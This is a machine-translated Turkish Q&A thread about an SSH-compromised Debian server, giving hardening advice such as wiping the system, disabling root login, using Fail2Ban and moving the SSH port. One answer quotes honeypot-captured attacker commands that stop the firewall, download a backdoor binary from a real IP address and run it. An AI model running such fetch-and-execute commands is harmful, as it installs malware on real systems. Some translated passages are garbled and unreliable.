Bu konuda yapabilecekleriniz: Yapılması en güvenli şey, sistemi silmek ve sıfırdan yeniden yüklemektir. Ancak bu her zaman bir seçenek olmayabilir. Yapılması gereken çok daha az güvenli bir şey tam olarak ne olduğunu analiz etmek ve eğer varsa izlerini silmektir. Yine, sistemi henüz yeniden başlatmadıysanız, belki de gereken tek /etc/rc.d/rc.localşey temizdir , saldırgan tarafından indirilen şeyleri kaldırın ve en sonuncusu değil, lanet parolanızı değiştirin!

Ancak, eğer saldırgan zaten yükü çalıştırabildiyse, sisteminizde tespit edilmesi zor olabilecek başka değişiklikler olabilir. Bu yüzden tam bir silme gerçekten tek güvenli (ve önerilen) seçenek. Belirttiğiniz gibi, söz konusu ekipman bir test / geliştirme hedefi olabilir, bu nedenle belki de silinmesi diğer durumlarda olabileceği kadar acı verici değildir.

Güncelleme : Olası bir iyileşme hakkında yazdıklarıma rağmen, MariusMatutiae'nin bu yükün neden olduğu olası hasarı ve hedef sisteme ne kadar zarar verebileceğini önemsiz kılmamasını şiddetle tavsiye ediyorum .


2
Teşekkürler. Sistemi silmeye karar verdim. Birkaç kez yeniden başlattım, ancak bazı önemli verileri kopyalamak için. İkili dosya yok, sadece kaynak kod var. Sanırım şimdi oldukça güvendeyim.
Şubat'ta

Peki ya aynı ağdaki diğer kutular?
WGroleau

İyi soru. Sağlanan kabuk geçmişi, aynı ağdaki diğer kutuları keşfetme ve tehlikeye atma girişimlerini göstermez. Daha genel olarak, eğer saldırgan bir kutuya SSH (root) erişimi kazanırsa, temelde herhangi bir çevre güvenlik duvarını atladığı anlamına gelir. Ancak, otomatik olarak diğer kutuları tehlikeye anlamına gelmez: o bir yama uygulanmamış açığı gibi başka bir şeyi gerektirecektir, şifreler vb başka bir kutuda gelen, otomatik giriş kutuları arasında paylaşılan
Viktor Toth

18

Benim sshd-honeypot da bu tür bir saldırı gördü. Bu URL’den ilk indirmeler 2016-01-29 10:25:33 tarihinde başlamıştır ve saldırılar devam etmektedir. Saldırılar geliyor / geliyordu

103.30.4.212
111.68.6.170
118.193.228.169

Bu saldırganlardan gelen girdi:

hizmet iptables stop
wget http://222.186.30.209:65534/yjz1
nohup / root / yjz1> / dev / null 2> & 1 &
chmod 0777 yjz1
chmod u + x yjz1
./yjz1 ve
chmod u + x yjz1
./yjz1 ve
cd / tmp

Yani daha sonraları için arka kapıyı kurmaktan başka bir faaliyet yok.


Kabul, aynı MO.
MariusMatutiae

1
@ MariusMatutiae Yani bu o zaman manuel bir kesmek değil mi? Bir çeşit kendine yayılan solucan / bot mu?
NickG,

1
@NickG En iyi tahminim, bunun manuel bir kesmek olmadığı. Çin menşeli bir botnet'in yaratıcısıyla aynı ofisteki çalışma olasılığı nedir? Birisi kendi makinesinde sömürülebilir bir zayıflık buldu, büyük olasılıkla zayıf güvenlikli bir ssh sunucusu, şifresini kaba bir şekilde zorladı, erişimi aldı, gizlice kurmaya çalıştı. Ancak, saldırganın Windows'ta Linux'a göre daha akıcı olduğu konusunda da iddiaya girerim. Ancak bunun hakkında kesin bir kanıtım yok , sadece eğitimli bir tahmin.
MariusMatutiae

12

Buradaki herkes sağlam bir öneri sundu, ancak açık olması için, önceliklerinizin o sistemden gerçekten neye ihtiyacınız olduğunu doğrulaması ve daha sonra bilinen güvenli medyadan yeni bir kurulumla silmeniz gerekir.

Yeni kurulan ana makinenizi İnternet'e bağlamadan önce, şu fikirleri gözden geçirin:

  1. Yeni bir root dışı kullanıcı oluşturun ve bu kullanıcı olarak giriş yapın. Asla root olarak giriş yapmanıza gerek yok, gerektiğinde sudo (kullanıcı yerine kullanıcı yerine).

  2. Zorunlu erişim kontrolünü sağlayan yapılandırma ayarları SE Linux yükleyin: https://wiki.debian.org/SELinux/Setup

  3. Ofis / ev ve İnternet arasında bir donanım güvenlik duvarı düşünün. Mükemmel topluluk desteğine sahip MicroTik kullanıyorum: http://routerboard.com/ .

Ücretli işinizi tamamlamak için bir zaman çizelgesinde olduğunuzu varsayarak en azından 1 numara yapın. # 3 hızlı ve ucuzdur, ancak postadaki paketi beklemeniz veya mağazaya gitmeniz gerekir.


3
Ve her şeyden önce, açık bir root oturumu ile PC'niz katılımsız çalışan bırakmayın!
MariusMatutiae

11
  1. debian-armhf sizin hostname? Veya varsayılan ayarlarla varsayılan bir kurulum mu kullanıyorsunuz? Bununla ilgili bir sorun yok, ancak ana bilgisayarın doğrudan Internet’e doğrudan maruz kalmasına izin vermemelisiniz (yani modeminiz tarafından korunmaz).

  2. Asıl sorun 222.186.30.209'dan geliyor gibi görünüyor ( http://anti-hacker-alliance.com/index.php?ip=222.186.30.209 ). Microsoft’un IP’sini görmek için fazla dikkat etmemelisiniz. IP'lere, kolayca veya daha az ya da daha az sahte olabilirler.

  3. İnternete bağlanmak için genel bir yol, bilinen bir port listesini kamu IP’nizden (örneğin 8.8.8.8) yerel bölgenize (örneğin, 192.168.1.12) iletmektir.

    • Örneğin, gelen tüm bağlantıları 8.8.8.8'den (genel) 192.168.1.12'ye (yerel) iletmeyin .

    • Yalnızca 22 ve 25 numaralı bağlantı noktalarını ilet (sırasıyla ssh ve gelen posta). Elbette, güncel ssh ve smtp paketlerine / kütüphanelerine de sahip olmalısınız .

  4. Sıradaki ne? Ana bilgisayar bağlantısını kesin ve kabuk komut dosyalarında (size utangaç!) Yazılan şifreleri (kuruluşla ilişkili tüm bilgisayarlarda) değiştirin /etc/shadow.


1. Evet debian-armhf , ana bilgisayar adıdır. 2. Evet, bu makaleyi okudum ve cest.microsoft.com web sitesi aracılığıyla Microsoft ile iletişim kurdum. 3. Sadece 25 ve 22'yi iletmiştim, iletilen başka bir şey yoktu. 4. Bunu yapacağım
saat

"IP kolayca ya da daha az sahte olabilir": Ben bir güvenlik ya da ağ uzmanı değilim. Bu nasıl mümkün olabilir?
kevinarpe

@kevinarpe Bu muhtemelen ayrı bir soru olarak daha iyidir.
bir CVn


2
@Archemar: SSH, TCP'dir; İmkansız değilse TCP kaynağı IP'ye taklit etmek zordur. Ayrıca, yukarıda belirtildiği gibi, Microsoft IP, bulut hizmeti Azure'a aittir; bu, başkalarının hizmet vermek için başkalarına saldırmak için zaman satın alabileceği anlamına gelir.
nneonneo 19

9

Diğerlerinin de belirttiği gibi, sunucunuzun güvenliğinin tehlikede olduğu oldukça açık. En güvenli şey bu makineyi silmek ve yeniden kurmak.

Sorunuzun ikinci bölümünü yanıtlamak için, genel anahtar auth kullanamıyorsanız, en azından Fail2Ban'ı kurmanızı ve SSH'yi standart olmayan bir bağlantı noktasında çalıştırmanızı öneririm. Ayrıca kök SSH erişimini de devre dışı bırakıyorum.

Fail2Ban , belirli zamanlarda oturum açamayan IP adreslerini yasaklayarak kaba kuvvet saldırılarını hafifletmeye yardımcı olacaktır.

Standart olmayan bir bağlantı noktasını dinlemek için sshd'yi ayarlamak en azından SSH sunucunuzun görünürlüğünü küçük bir miktar azaltmaya yardımcı olacaktır. Kök oturum açma özelliğini devre dışı bırakmak da saldırı profilini biraz azaltır. İçinde /etc/sshd_config:

PermitRootLogin no
Port xxxxx

Root login devre dışı bırakılmış sudurumdayken, bağlandığınızda bir kez root'a geçmeniz veya (daha tercihen) sudoayrıcalıklı komutları çalıştırmak için kullanmanız gerekir.


İkisini de yaptım, tavsiyen için teşekkürler.
saat

8

SSH sunucuları internete sürekli saldırı altındadır. Yaptığın birkaç şey:

  1. İnternet erişimi olan makineler için çok güvenli bir rasgele şifre kullandığınızdan emin olun. 16 karakter veya daha fazla ve tamamen rastgele demek istiyorum. Bir şifre yöneticisi kullanın, böylece ezberlemek zorunda kalmazsınız. Parolanızı ezberleyebilirsiniz, bu çok basit.

  2. SSH'ye ihtiyacınız yoksa kapatın. İhtiyacınız varsa, ancak herkesin erişimine ihtiyaç duymuyorsanız, standart olmayan yüksek bir port numarasında çalıştırın. Bunu yapmak hack girişimlerini önemli ölçüde azaltacaktır. Evet, özel bir bilgisayar korsanı bağlantı noktası taraması yapabilir, ancak otomatikleştirilmiş botlar bulamaz.

Yetkilendirme günlüğünüzdeki snippet başarısız bir girişim gösteriyor. Ancak daha fazla bakarsanız, başarılı bir giriş yaptığınızdan şüpheniz kalmaz. Basit bir parola kullanıyorsunuz, daha sonra bir botun girmesi önemsiz.

Bu makineyi ağdan izole etmeniz gerekiyor. İhtiyacınız olanı çok dikkatli bir şekilde alın ve silin.


7
22 numaralı limanda ssh kullandığımda, genellikle günde binlerce hack denemesi yapardım. Yüksek bir liman numarasına (50000'den fazla) değiştirdiğimde bu kesmek tamamen durmaya çalışıyor.
user1751825

16 karakter yeterince güvenli değil. Kullanıcı oturumunu kapatması da kullanışlıdır. Sadece perma kilitleme yapmayın, süresinin dolmasını sağlayın, ancak bir saat gibi bir şey yapın. Bu şekilde sunucuya hala erişebilirsiniz.
Ramhound

2) güçlü kimlik doğrulamanız (genel anahtar veya güçlü bir şifre) olduğu sürece güvenlik için kesinlikle gerekli olmadığına dikkat edin.
user20574

2
@ Ramhound Neden olmasın? Yalnızca küçük harf olsa bile, 16 küçük harf 43608742899428874059776, kaba kuvvet için pratik olmayan olasılıklar verir, özellikle de sunucunun sizi her girişimde beklettiğinizde beklettiği çevrimiçi kaba kuvvet için.
user20574

3
@ user20574. Kesin olarak gerekli olmamakla birlikte, SSH hizmetinin görünürlüğünü azaltmak hala çok yararlı. Herhangi bir nedenden ötürü kütüğünüzdeki karmaşayı gidermekten başka bir sebep olmasa bile. Bir makinenin yalnızca sınırlı bir grup insan tarafından erişilebilir olması gerekiyorsa, standart olmayan bir liman güvenliği artırmak için mükemmel bir adımdır.
user1751825

6

Öne bakan bir Linux / Unix sunucusu kurduktan sonra herkesin / herkesin yapması gereken ilk şey hemen devre dışı bırakmaktır root.

Sisteminiz tehlikeye girdi. Bir dereceye kadar bakmak harika olabilir çalışan bir geçmiş günlüğü var. Ancak, ayrıntıları doğru bir şekilde incelemek biraz nitelidir ve sunucunuzu güvence altına almanıza yardımcı olmaz. Botnet, kötü amaçlı yazılım ürettiğinde (sunucunuza virüs bulaşması muhtemel olan) bir Linux sistemini etkilediğinde ortaya çıkan her türlü saçmalığı gösterir. @MariusMatutiae tarafından verilen cevap güzel ve iyi düşünülmüş ve rootkötü amaçlı yazılım / botnet'in ıslak rüyası olan erişiminizle sizi hakettiğini tekrarlayan başkaları da var.

Nasıl devre dışı rootbırakılacağına dair birkaç açıklama var ama kişisel deneyimimden bahsedeceğim, çoğu şu anda tarif edeceğim şeyin ötesine geçiyor. Bu ne olmalıdır ne zaman ilk kurulum sunucusu yapmış:

  1. sudoHaklara sahip yeni bir kullanıcı oluşturun : Ubuntu veya başka bir Debian sistemi kullanıyorsanız olduğu cooldudegibi bir komutu sudo adduser cooldudekullanarak yeni bir ada sahip yeni bir kullanıcı oluşturun . Ardından, sudoböyle bir komut kullanarak dosyayı el ile düzenleyin ve okuması gereken eşdeğer satırın altına sudo nano /etc/sudoersbenzer bir satır ekleyin . Bu işlem bittikten sonra, giriş yapın ve hakların işe yarayıp yaramadığını görmek için komutu ( temel ve yıkıcı olmayan bir şey gibi) bir komutla test edin . Sizden şifre istenebilir. Bu işe yarıyor? Hepsi iyi! Bir sonraki adıma geçin.cooldude ALL=(ALL:ALL) ALLroot ALL=(ALL:ALL) ALLcooldudesudosudo wsudo
  2. rootHesabı kilitle : Tamam, şimdi bu haklardan cooldudesorumlu sudo, farklı oturum aç cooldudeve kök hesabı kilitlemek için bu komutu çalıştır sudo passwd -l root. Bir şekilde SSH anahtar çifti oluşturduysanız , anahtarları rootaçın /root/.ssh/authorized_keysve çıkarın. Ya da daha iyisi, sadece o dosyayı yeniden adlandırmak authorized_keys_OFF, böyle sudo mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_OFFetkili bir SSH tuşları devre dışı bırakmak için. Daha sonra tercih ederim, çünkü şanssız şifreniz hala daha az oturum açmaya ihtiyaç duyar, bu dosyayı tekrar orijinal ismine taşıyabilirsiniz ve gitmeniz iyi olur.

FWIW, yıllar boyunca onlarca Linux sunucusunu yönettim (onlarca yıl?) Ve sadece devre dışı bırakmanın root- ve sudohaklara sahip yeni bir kullanıcı kurmanın - herhangi bir Linux sistemini güvence altına almanın en basit ve en temel yoludur. Bir kez rootdevre dışı bırakıldığında SSH aracılığıyla hiçbir şekilde bir uzlaşma ile uğraşmak zorunda kalmadım . Ve evet, giriş yapma girişimlerini görebilirsiniz, auth.logancak anlamsızlar; eğer rootdevre dışı bırakılırsa, bu girişimler hiçbir zaman bir şey yapmaz. Arkanıza yaslanın ve başarısız başarısızlık girişimlerini izleyin!

Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.